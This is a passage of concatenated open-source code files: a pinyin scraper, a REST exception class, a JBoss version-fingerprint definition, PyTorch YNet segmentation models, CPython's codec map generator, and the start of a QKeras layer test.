pq = PyQuery(html)
pq = PyQuery(pq('table.zui td')[1])
text = pq('tr').text()
text_alternate = pq(html)('.info_txt2')('em').text()
pinyin = ''
pinyin_match = re_pinyin.search(text)
if pinyin_match is not None:
pinyin = pinyin_match.group('pinyin')
code = re_code.search(text).group('code')
alternate = ''
alternate_match = re_alternate.search(text_alternate)
if alternate_match is not None:
alternate = alternate_match.group('alternate')
return HanziInfo(pinyin, code, alternate)
def parse_hanzi(hanzi):
info = fetch_info(hanzi)
if (not info.pinyin) and info.alternate:
alternate = fetch_info(info.alternate)
else:
alternate = ''
return HanziInfo(info.pinyin, info.code, alternate)
def main(lines):
for line in lines:
if line.startswith('# U+') and '<-' in line:
# # U+xxx ... -> U+xxx
code = line.split(':')[0].strip('# ')
# U+xxx -> xxx
code = code[2:]
info = parse_hanzi(code)
pinyin = info.pinyin
extra = ''
if (not pinyin) and info.alternate:
alternate = info.alternate
pinyin = alternate.pinyin
extra = ' => U+{0}'.format(alternate.code)
if ',' in pinyin:
first_pinyin, extra_pinyin = pinyin.split(',', 1)
pinyin = first_pinyin
extra += ' ?-> ' + extra_pinyin
if pinyin:
line = line.strip()
# # U+xxx -> U+xxx
line = line[2:]
line = line.replace('<-', pinyin)
if extra:
line += extra
yield line.strip()
if __name__ == '__main__':
args = sys.argv[1:]
input_file = args[0]
with open(input_file) as fp:
for line in main(fp):
print(line)
|
api/features/exceptions.py | SolidStateGroup/Bullet-Train-API | 126 | 30791 | from rest_framework import status
from rest_framework.exceptions import APIException
class FeatureStateVersionError(APIException):
status_code = status.HTTP_400_BAD_REQUEST
class FeatureStateVersionAlreadyExistsError(FeatureStateVersionError):
status_code = status.HTTP_400_BAD_REQUEST
def __init__(self, version: int):
super(FeatureStateVersionAlreadyExistsError, self).__init__(
f"Version {version} already exists for FeatureState."
)
|
tests/__init__.py | RonenTRA/faster-than-requests | 857 | 30811 | # Allow tests/ directory to see faster_than_requests/ package on PYTHONPATH
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parent.parent))
|
html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py | meyerweb/wpt | 14,668 | 30838 | <filename>html/semantics/scripting-1/the-script-element/module/resources/delayed-modulescript.py<gh_stars>1000+
import time
def main(request, response):
delay = float(request.GET.first(b"ms", 500))
time.sleep(delay / 1E3)
return [(b"Content-type", b"text/javascript")], u"export let delayedLoaded = true;"
|
src/platform/jboss/fingerprints/JBoss71Manage.py | 0x27/clusterd | 539 | 30884 | <filename>src/platform/jboss/fingerprints/JBoss71Manage.py
from src.platform.jboss.interfaces import JINTERFACES
from cprint import FingerPrint
class FPrint(FingerPrint):
def __init__(self):
self.platform = "jboss"
self.version = "7.1"
self.title = JINTERFACES.MM
self.uri = "/console/app/gwt/chrome/chrome_rtl.css"
self.port = 9990
self.hash = "14755bd918908c2703c57bd1a52046b6"
|
YNet/stage2/Model.py | cancertech/-cancer_diagnosis | 126 | 30896 | <gh_stars>100-1000
#
# author: <NAME>
# Project Description: This repository contains source code for semantically segmenting WSIs; however, it could be easily
# adapted for other domains such as natural image segmentation
# File Description: This file contains the CNN models
# ==============================================================================
import torch
import torch.nn as nn
class CBR(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
self.act = nn.ReLU(True)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
output = self.act(output)
return output
class CB(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
def forward(self, input):
output = self.conv(input)
output = self.bn(output)
return output
class C(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1):
super().__init__()
padding = int((kSize - 1) / 2)
self.conv = nn.Conv2d(nIn, nOut, kSize, stride=stride, padding=padding, bias=False)
def forward(self, input):
output = self.conv(input)
return output
class DownSampler(nn.Module):
def __init__(self, nIn, nOut):
super().__init__()
self.conv = nn.Conv2d(nIn, nOut - nIn, 3, stride=2, padding=1, bias=False)
self.pool = nn.AvgPool2d(3, stride=2, padding=1)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
def forward(self, input):
output = torch.cat([self.conv(input), self.pool(input)], 1)
output = self.bn(output)
output = self.act(output)
return output
class BasicResidualBlock(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
self.c1 = CBR(nIn, nOut, 3, 1)
self.c2 = CB(nOut, nOut, 3, 1)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output = self.c1(input)
output = self.c2(output)
output = input + output
# output = self.drop(output)
output = self.act(output)
return output
class DownSamplerA(nn.Module):
def __init__(self, nIn, nOut):
super().__init__()
self.conv = CBR(nIn, nOut, 3, 2)
def forward(self, input):
output = self.conv(input)
return output
class BR(nn.Module):
def __init__(self, nOut):
super().__init__()
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-03)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
def forward(self, input):
output = self.bn(input)
output = self.act(output)
return output
class CDilated(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1, d=1):
super().__init__()
padding = int((kSize - 1) / 2) * d
self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False,
dilation=d)
def forward(self, input):
output = self.conv(input)
return output
class CDilated1(nn.Module):
def __init__(self, nIn, nOut, kSize, stride=1, d=1):
super().__init__()
padding = int((kSize - 1) / 2) * d
self.conv = nn.Conv2d(nIn, nOut, (kSize, kSize), stride=stride, padding=(padding, padding), bias=False,
dilation=d)
self.br = BR(nOut)
def forward(self, input):
output = self.conv(input)
return self.br(output)
class DilatedParllelResidualBlockB(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
n = int(nOut / 5)
n1 = nOut - 4 * n
self.c1 = C(nIn, n, 1, 1)
self.d1 = CDilated(n, n1, 3, 1, 1)
self.d2 = CDilated(n, n, 3, 1, 2)
self.d4 = CDilated(n, n, 3, 1, 4)
self.d8 = CDilated(n, n, 3, 1, 8)
self.d16 = CDilated(n, n, 3, 1, 16)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output1 = self.c1(input)
d1 = self.d1(output1)
d2 = self.d2(output1)
d4 = self.d4(output1)
d8 = self.d8(output1)
d16 = self.d16(output1)
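# Hierarchical feature fusion (as in ESP modules): each dilated branch is summed with the
# previous ones before concatenation, which reduces gridding artifacts from large dilation rates.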
add1 = d2
add2 = add1 + d4
add3 = add2 + d8
add4 = add3 + d16
combine = torch.cat([d1, add1, add2, add3, add4], 1)
combine_in_out = input + combine
output = self.bn(combine_in_out)
# output = self.drop(output)
output = self.act(output)
return output
class DilatedParllelResidualBlockB1(nn.Module):
def __init__(self, nIn, nOut, prob=0.03):
super().__init__()
n = int(nOut / 4)
n1 = nOut - 3 * n
self.c1 = C(nIn, n, 3, 1)
self.d1 = CDilated(n, n1, 3, 1, 1)
self.d2 = CDilated(n, n, 3, 1, 2)
self.d4 = CDilated(n, n, 3, 1, 4)
self.d8 = CDilated(n, n, 3, 1, 8)
self.d16 = CDilated(n, n, 3, 1, 16)
self.bn = nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3)
self.act = nn.ReLU(True) # nn.PReLU(nOut)
# self.drop = nn.Dropout2d(p=prob)
def forward(self, input):
output1 = self.c1(input)
d1 = self.d1(output1)
d2 = self.d2(output1)
d4 = self.d4(output1)
d8 = self.d8(output1)
# d16 = self.d16(output1)
add1 = d2
add2 = add1 + d4
add3 = add2 + d8
# add4 = add3 + d16
combine = torch.cat([d1, add1, add2, add3], 1)
combine_in_out = input + combine
output = self.bn(combine_in_out)
# output = self.drop(output)
output = self.act(output)
return output
class PSPDec(nn.Module):
def __init__(self, nIn, nOut, downSize, upSize=48):
super().__init__()
self.features = nn.Sequential(
nn.AdaptiveAvgPool2d(downSize),
nn.Conv2d(nIn, nOut, 1, bias=False),
nn.BatchNorm2d(nOut, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(nOut),
nn.Upsample(size=upSize, mode='bilinear')
)
def forward(self, x):
return self.features(x)
class ResNetC1(nn.Module):
'''
Segmentation model with ESP as the encoding block.
This is the same as in stage 1
'''
def __init__(self, classes):
super().__init__()
self.level1 = CBR(3, 16, 7, 2) # 384 x 384
self.p01 = PSPDec(16 + classes, classes, 160, 192)
self.p02 = PSPDec(16 + classes, classes, 128, 192)
self.p03 = PSPDec(16 + classes, classes, 96, 192)
self.p04 = PSPDec(16 + classes, classes, 72, 192)
self.class_0 = nn.Sequential(
nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(classes, classes, 7, padding=3, bias=False)
)
self.level2 = DownSamplerA(16, 128)
self.level2_0 = DilatedParllelResidualBlockB1(128, 128)
self.level2_1 = DilatedParllelResidualBlockB1(128, 128) # 512 x 256
self.p10 = PSPDec(8 + 256, 64, 80, 96)
self.p20 = PSPDec(8 + 256, 64, 64, 96)
self.p30 = PSPDec(8 + 256, 64, 48, 96)
self.p40 = PSPDec(8 + 256, 64, 36, 96)
self.class_1 = nn.Sequential(
nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.br_2 = BR(256)
self.level3_0 = DownSamplerA(256, 256)
self.level3_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level3_2 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 256 x 128
self.level4_1 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level4_2 = DilatedParllelResidualBlockB1(256, 256, 0.3)
self.level4_3 = DilatedParllelResidualBlockB1(256, 256, 0.3) # 128 x 64
self.p1 = PSPDec(512, 128, 40)
self.p2 = PSPDec(512, 128, 32)
self.p3 = PSPDec(512, 128, 24)
self.p4 = PSPDec(512, 128, 18)
self.br_4 = BR(512)
self.classifier = nn.Sequential(
nn.Conv2d(512 + 4 * 128, 128, 1, padding=0, bias=False),
nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
nn.ReLU(True), # nn.PReLU(classes),
# nn.Dropout2d(.1),
nn.Conv2d(128, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
# C(320, classes, 7, 1)
self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')
def forward(self, input1):
# input1 = self.cmlrn(input)
output0 = self.level1(input1)
output1_0 = self.level2(output0)
output1 = self.level2_0(output1_0)
output1 = self.level2_1(output1)
output1 = self.br_2(torch.cat([output1_0, output1], 1))
output2_0 = self.level3_0(output1)
output2 = self.level3_1(output2_0)
output2 = self.level3_2(output2)
output3 = self.level4_1(output2)
output3 = self.level4_2(output3)
output3 = self.level4_3(output3)
output3 = self.br_4(torch.cat([output2_0, output3], 1))
output3 = self.classifier(
torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
output3 = self.upsample_3(output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.class_1(torch.cat(
[combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
self.p40(combine_up_23)], 1))
output23_hook = self.upsample_2(output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.class_0(torch.cat(
[combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
# output3 = output2_0 + output3
# classifier = self.classifier(output3)
classifier = self.upsample_1(output0_hook)
return classifier
class ResNetC1_YNet(nn.Module):
'''
Jointly learning the segmentation and classification with ESP as encoding blocks
'''
def __init__(self, classes, diagClasses, segNetFile=None):
super().__init__()
self.level4_0 = DownSamplerA(512, 128)
self.level4_1 = DilatedParllelResidualBlockB1(128, 128, 0.3)
self.level4_2 = DilatedParllelResidualBlockB1(128, 128, 0.3)
self.br_con_4 = BR(256)
self.level5_0 = DownSamplerA(256, 64)
self.level5_1 = DilatedParllelResidualBlockB1(64, 64, 0.3)
self.level5_2 = DilatedParllelResidualBlockB1(64, 64, 0.3)
self.br_con_5 = BR(128)
self.global_Avg = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(128, 64)
self.fc2 = nn.Linear(64, diagClasses)
# segmentation model
self.segNet = ResNetC1(classes)
if segNetFile is not None:
print('Loading pre-trained segmentation model')
self.segNet.load_state_dict(torch.load(segNetFile))
        # Cache the encoder's sub-modules; forward() below indexes this list by
        # the registration order of ResNetC1.__init__ (0 = level1, 26 = classifier,
        # 27-29 = the three Upsample layers).
        self.modules = []
        for i, m in enumerate(self.segNet.children()):
            self.modules.append(m)
def forward(self, input1):
output0 = self.modules[0](input1)
output1_0 = self.modules[6](output0) # downsample
output1 = self.modules[7](output1_0)
output1 = self.modules[8](output1)
output1 = self.modules[14](torch.cat([output1_0, output1], 1))
output2_0 = self.modules[15](output1) # downsample
output2 = self.modules[16](output2_0)
output2 = self.modules[17](output2)
output3 = self.modules[18](output2)
output3 = self.modules[19](output3)
output3 = self.modules[20](output3)
output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
output3 = self.modules[26](
torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
output3 = self.modules[29](output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.modules[13](torch.cat(
[combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
self.modules[11](combine_up_23),
self.modules[12](combine_up_23)], 1))
output23_hook = self.modules[28](output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.modules[5](torch.cat(
[combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
self.modules[4](combine_up)], 1))
        # segmentation classifier
classifier = self.modules[27](output0_hook)
# diagnostic branch
l5_0 = self.level4_0(output3_hook)
l5_1 = self.level4_1(l5_0)
l5_2 = self.level4_2(l5_1)
l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
l6_0 = self.level5_0(l5_con)
l6_1 = self.level5_1(l6_0)
l6_2 = self.level5_2(l6_1)
l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
glbAvg = self.global_Avg(l6_con)
flatten = glbAvg.view(glbAvg.size(0), -1)
fc1 = self.fc1(flatten)
diagClass = self.fc2(fc1)
return classifier, diagClass
class ResNetD1(nn.Module):
'''
Segmentation model with RCB as encoding blocks.
This is the same as in Stage 1
'''
def __init__(self, classes):
super().__init__()
self.level1 = CBR(3, 16, 7, 2) # 384 x 384
self.p01 = PSPDec(16 + classes, classes, 160, 192)
self.p02 = PSPDec(16 + classes, classes, 128, 192)
self.p03 = PSPDec(16 + classes, classes, 96, 192)
self.p04 = PSPDec(16 + classes, classes, 72, 192)
self.class_0 = nn.Sequential(
nn.Conv2d(16 + 5 * classes, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 7, padding=3, bias=False)
)
self.level2 = DownSamplerA(16, 128)
self.level2_0 = BasicResidualBlock(128, 128)
self.level2_1 = BasicResidualBlock(128, 128) # 512 x 256
self.p10 = PSPDec(8 + 256, 64, 80, 96)
self.p20 = PSPDec(8 + 256, 64, 64, 96)
self.p30 = PSPDec(8 + 256, 64, 48, 96)
self.p40 = PSPDec(8 + 256, 64, 36, 96)
self.class_1 = nn.Sequential(
nn.Conv2d(8 + 256 + 64 * 4, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.br_2 = BR(256)
self.level3_0 = DownSamplerA(256, 256)
self.level3_1 = BasicResidualBlock(256, 256, 0.3)
self.level3_2 = BasicResidualBlock(256, 256, 0.3)
self.level4_1 = BasicResidualBlock(256, 256, 0.3)
self.level4_2 = BasicResidualBlock(256, 256, 0.3)
self.level4_3 = BasicResidualBlock(256, 256, 0.3)
self.p1 = PSPDec(512, 128, 40)
self.p2 = PSPDec(512, 128, 32)
self.p3 = PSPDec(512, 128, 24)
self.p4 = PSPDec(512, 128, 18)
self.br_4 = BR(512)
self.classifier = nn.Sequential(
nn.Conv2d(512 + 128 * 4, 128, 1, padding=0, bias=False),
nn.BatchNorm2d(128, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(128, classes, 3, padding=1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True),
nn.Conv2d(classes, classes, 1, bias=False),
nn.BatchNorm2d(classes, momentum=0.95, eps=1e-3),
nn.ReLU(True)
)
self.upsample_1 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_2 = nn.Upsample(scale_factor=2, mode='bilinear')
self.upsample_3 = nn.Upsample(scale_factor=2, mode='bilinear')
def forward(self, input1):
# input1 = self.cmlrn(input)
output0 = self.level1(input1)
output1_0 = self.level2(output0)
output1 = self.level2_0(output1_0)
output1 = self.level2_1(output1)
output1 = self.br_2(torch.cat([output1_0, output1], 1))
output2_0 = self.level3_0(output1)
output2 = self.level3_1(output2_0)
output2 = self.level3_2(output2)
output3 = self.level4_1(output2)
output3 = self.level4_2(output3)
output3 = self.level4_3(output3)
output3 = self.br_4(torch.cat([output2_0, output3], 1))
output3 = self.classifier(
torch.cat([output3, self.p1(output3), self.p2(output3), self.p3(output3), self.p4(output3)], 1))
output3 = self.upsample_3(output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.class_1(torch.cat(
[combine_up_23, self.p10(combine_up_23), self.p20(combine_up_23), self.p30(combine_up_23),
self.p40(combine_up_23)], 1))
output23_hook = self.upsample_2(output23_hook)
combine_up = torch.cat([output23_hook, output0], 1)
output0_hook = self.class_0(torch.cat(
[combine_up, self.p01(combine_up), self.p02(combine_up), self.p03(combine_up), self.p04(combine_up)], 1))
classifier = self.upsample_1(output0_hook)
return classifier
class ResNetD1_YNet(nn.Module):
'''
Jointly learning the segmentation and classification with RCB as encoding blocks
'''
def __init__(self, classes, diagClasses, segNetFile=None):
super().__init__()
self.level4_0 = DownSamplerA(512, 128) # 24x24
self.level4_1 = BasicResidualBlock(128, 128, 0.3)
self.level4_2 = BasicResidualBlock(128, 128, 0.3)
self.br_con_4 = BR(256)
self.level5_0 = DownSamplerA(256, 64) # 12x12
self.level5_1 = BasicResidualBlock(64, 64, 0.3)
self.level5_2 = BasicResidualBlock(64, 64, 0.3)
self.br_con_5 = BR(128)
self.global_Avg = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Linear(128, 64)
self.fc2 = nn.Linear(64, diagClasses)
self.segNet = ResNetD1(classes) # 384 x 384
if segNetFile is not None:
print('Loading segmentation pre-trained model')
self.segNet.load_state_dict(torch.load(segNetFile))
        # Cache the encoder's sub-modules; forward() below indexes this list by
        # the registration order of ResNetD1.__init__ (same layout as ResNetC1).
        self.modules = []
        for i, m in enumerate(self.segNet.children()):
            self.modules.append(m)
            # print(i, m)
def forward(self, input1):
output0 = self.modules[0](input1)
output1_0 = self.modules[6](output0) # downsample
output1 = self.modules[7](output1_0)
output1 = self.modules[8](output1)
output1 = self.modules[14](torch.cat([output1_0, output1], 1))
output2_0 = self.modules[15](output1) # downsample
output2 = self.modules[16](output2_0)
output2 = self.modules[17](output2)
output3 = self.modules[18](output2)
output3 = self.modules[19](output3)
output3 = self.modules[20](output3)
output3_hook = self.modules[25](torch.cat([output2_0, output3], 1))
output3 = self.modules[26](
torch.cat([output3_hook, self.modules[21](output3_hook), self.modules[22](output3_hook),
self.modules[23](output3_hook), self.modules[24](output3_hook)], 1))
output3 = self.modules[29](output3)
combine_up_23 = torch.cat([output3, output1], 1)
output23_hook = self.modules[13](torch.cat(
[combine_up_23, self.modules[9](combine_up_23), self.modules[10](combine_up_23),
self.modules[11](combine_up_23),
self.modules[12](combine_up_23)], 1))
output23_hook = self.modules[28](output23_hook)
combine_up = torch.cat([output0, output23_hook], 1)
output0_hook = self.modules[5](torch.cat(
[combine_up, self.modules[1](combine_up), self.modules[2](combine_up), self.modules[3](combine_up),
self.modules[4](combine_up)], 1))
        # segmentation classifier
classifier = self.modules[27](output0_hook)
# diagnostic branch
l5_0 = self.level4_0(output3_hook)
l5_1 = self.level4_1(l5_0)
l5_2 = self.level4_2(l5_1)
l5_con = self.br_con_4(torch.cat([l5_0, l5_2], 1))
l6_0 = self.level5_0(l5_con)
l6_1 = self.level5_1(l6_0)
l6_2 = self.level5_2(l6_1)
l6_con = self.br_con_5(torch.cat([l6_0, l6_2], 1))
glbAvg = self.global_Avg(l6_con)
flatten = glbAvg.view(glbAvg.size(0), -1)
fc1 = self.fc1(flatten)
diagClass = self.fc2(fc1)
return classifier, diagClass
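# --- Hedged usage sketch (not part of the original file) ---------------------
# Smoke-tests the joint model above on a dummy batch. The values here are
# assumptions rather than anything fixed by this file: classes=8 matches the
# hard-coded "8 + 256" decoder widths, diagClasses=4 is arbitrary, and the
# 384x384 input follows the "384 x 384" comments next to level1. It also
# assumes the torch / torch.nn imports and the C, CBR, DownSamplerA and
# BasicResidualBlock blocks defined earlier in this file.
if __name__ == '__main__':
    net = ResNetC1_YNet(classes=8, diagClasses=4)
    net.eval()
    with torch.no_grad():
        seg_out, diag_out = net(torch.randn(1, 3, 384, 384))
    print(seg_out.shape)   # segmentation logits, back at the input resolution
    print(diag_out.shape)  # (1, diagClasses) diagnosis logits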
|
Tools/unicode/genmap_support.py | shawwn/cpython | 52,316 | 30904 | <filename>Tools/unicode/genmap_support.py
#
# genmap_support.py: Multibyte Codec Map Generator
#
# Original Author: <NAME> <<EMAIL>>
# Modified Author: <NAME> <<EMAIL>>
#
class BufferedFiller:
def __init__(self, column=78):
self.column = column
self.buffered = []
self.cline = []
self.clen = 0
self.count = 0
def write(self, *data):
for s in data:
if len(s) > self.column:
raise ValueError("token is too long")
if len(s) + self.clen > self.column:
self.flush()
self.clen += len(s)
self.cline.append(s)
self.count += 1
def flush(self):
if not self.cline:
return
self.buffered.append(''.join(self.cline))
self.clen = 0
del self.cline[:]
def printout(self, fp):
self.flush()
for l in self.buffered:
fp.write(f'{l}\n')
del self.buffered[:]
def __len__(self):
return self.count
class DecodeMapWriter:
filler_class = BufferedFiller
def __init__(self, fp, prefix, decode_map):
self.fp = fp
self.prefix = prefix
self.decode_map = decode_map
self.filler = self.filler_class()
def update_decode_map(self, c1range, c2range, onlymask=(), wide=0):
c2values = range(c2range[0], c2range[1] + 1)
for c1 in range(c1range[0], c1range[1] + 1):
if c1 not in self.decode_map or (onlymask and c1 not in onlymask):
continue
c2map = self.decode_map[c1]
rc2values = [n for n in c2values if n in c2map]
if not rc2values:
continue
c2map[self.prefix] = True
c2map['min'] = rc2values[0]
c2map['max'] = rc2values[-1]
c2map['midx'] = len(self.filler)
for v in range(rc2values[0], rc2values[-1] + 1):
if v in c2map:
self.filler.write('%d,' % c2map[v])
else:
self.filler.write('U,')
def generate(self, wide=False):
if not wide:
self.fp.write(f"static const ucs2_t __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
else:
self.fp.write(f"static const Py_UCS4 __{self.prefix}_decmap[{len(self.filler)}] = {{\n")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
if not wide:
self.fp.write(f"static const struct dbcs_index {self.prefix}_decmap[256] = {{\n")
else:
self.fp.write(f"static const struct widedbcs_index {self.prefix}_decmap[256] = {{\n")
for i in range(256):
if i in self.decode_map and self.prefix in self.decode_map[i]:
m = self.decode_map
prefix = self.prefix
else:
self.filler.write("{", "0,", "0,", "0", "},")
continue
self.filler.write("{", "__%s_decmap" % prefix, "+", "%d" % m[i]['midx'],
",", "%d," % m[i]['min'], "%d" % m[i]['max'], "},")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
class EncodeMapWriter:
filler_class = BufferedFiller
elemtype = 'DBCHAR'
indextype = 'struct unim_index'
def __init__(self, fp, prefix, encode_map):
self.fp = fp
self.prefix = prefix
self.encode_map = encode_map
self.filler = self.filler_class()
def generate(self):
self.buildmap()
self.printmap()
def buildmap(self):
for c1 in range(0, 256):
if c1 not in self.encode_map:
continue
c2map = self.encode_map[c1]
rc2values = [k for k in c2map.keys()]
rc2values.sort()
if not rc2values:
continue
c2map[self.prefix] = True
c2map['min'] = rc2values[0]
c2map['max'] = rc2values[-1]
c2map['midx'] = len(self.filler)
for v in range(rc2values[0], rc2values[-1] + 1):
if v not in c2map:
self.write_nochar()
elif isinstance(c2map[v], int):
self.write_char(c2map[v])
elif isinstance(c2map[v], tuple):
self.write_multic(c2map[v])
else:
raise ValueError
def write_nochar(self):
self.filler.write('N,')
def write_multic(self, point):
self.filler.write('M,')
def write_char(self, point):
self.filler.write(str(point) + ',')
def printmap(self):
self.fp.write(f"static const {self.elemtype} __{self.prefix}_encmap[{len(self.filler)}] = {{\n")
self.filler.printout(self.fp)
self.fp.write("};\n\n")
self.fp.write(f"static const {self.indextype} {self.prefix}_encmap[256] = {{\n")
for i in range(256):
if i in self.encode_map and self.prefix in self.encode_map[i]:
self.filler.write("{", "__%s_encmap" % self.prefix, "+",
"%d" % self.encode_map[i]['midx'], ",",
"%d," % self.encode_map[i]['min'],
"%d" % self.encode_map[i]['max'], "},")
else:
self.filler.write("{", "0,", "0,", "0", "},")
continue
self.filler.printout(self.fp)
self.fp.write("};\n\n")
def open_mapping_file(path, source):
try:
f = open(path)
except IOError:
raise SystemExit(f'{source} is needed')
return f
def print_autogen(fo, source):
fo.write(f'// AUTO-GENERATED FILE FROM {source}: DO NOT EDIT\n')
def loadmap(fo, natcol=0, unicol=1, sbcs=0):
print("Loading from", fo)
fo.seek(0, 0)
decmap = {}
for line in fo:
line = line.split('#', 1)[0].strip()
if not line or len(line.split()) < 2:
continue
row = [eval(e) for e in line.split()]
loc, uni = row[natcol], row[unicol]
if loc >= 0x100 or sbcs:
decmap.setdefault((loc >> 8), {})
decmap[(loc >> 8)][(loc & 0xff)] = uni
return decmap
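# --- Hedged usage sketch (not part of the original module) -------------------
# Exercises DecodeMapWriter on a tiny hand-built decode map instead of a real
# CJKCodecs mapping file; the byte/code-point values below are made up purely
# for illustration, and the generated C tables are written to stdout.
if __name__ == '__main__':
    import sys
    toy_decmap = {0xA1: {0xA1: 0x3000, 0xA2: 0x3001, 0xA3: 0x3002}}
    writer = DecodeMapWriter(sys.stdout, 'toy', toy_decmap)
    writer.update_decode_map((0xA1, 0xA1), (0xA1, 0xFE))
    writer.generate(wide=False)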
|
tests/qlayers_test.py | kshithijiyer/qkeras | 388 | 30905 | <reponame>kshithijiyer/qkeras
# Copyright 2019 Google LLC
#
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Test layers from qlayers.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from numpy.testing import assert_allclose
import pytest
import logging
from tensorflow.keras import backend as K
from tensorflow.keras.layers import Activation
from tensorflow.keras.layers import Flatten
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
from tensorflow.keras.backend import clear_session
from qkeras import QActivation
from qkeras import QDense
from qkeras import quantized_bits
from qkeras.utils import model_save_quantized_weights
from qkeras.utils import quantized_model_from_json
def qdense_util(layer_cls,
kwargs=None,
input_data=None,
weight_data=None,
expected_output=None):
"""qlayer test utility."""
input_shape = input_data.shape
input_dtype = input_data.dtype
layer = layer_cls(**kwargs)
x = Input(shape=input_shape[1:], dtype=input_dtype)
y = layer(x)
layer.set_weights(weight_data)
model = Model(x, y)
actual_output = model.predict(input_data)
if expected_output is not None:
assert_allclose(actual_output, expected_output, rtol=1e-4)
@pytest.mark.parametrize(
'layer_kwargs, input_data, weight_data, bias_data, expected_output',
[
(
{
'units': 2,
'use_bias': True,
'kernel_initializer': 'glorot_uniform',
'bias_initializer': 'zeros'
},
np.array([[1, 1, 1, 1]], dtype=K.floatx()),
np.array([[10, 20], [10, 20], [10, 20], [10, 20]],
dtype=K.floatx()), # weight_data
np.array([0, 0], dtype=K.floatx()), # bias
np.array([[40, 80]], dtype=K.floatx())), # expected_output
(
{
'units': 2,
'use_bias': True,
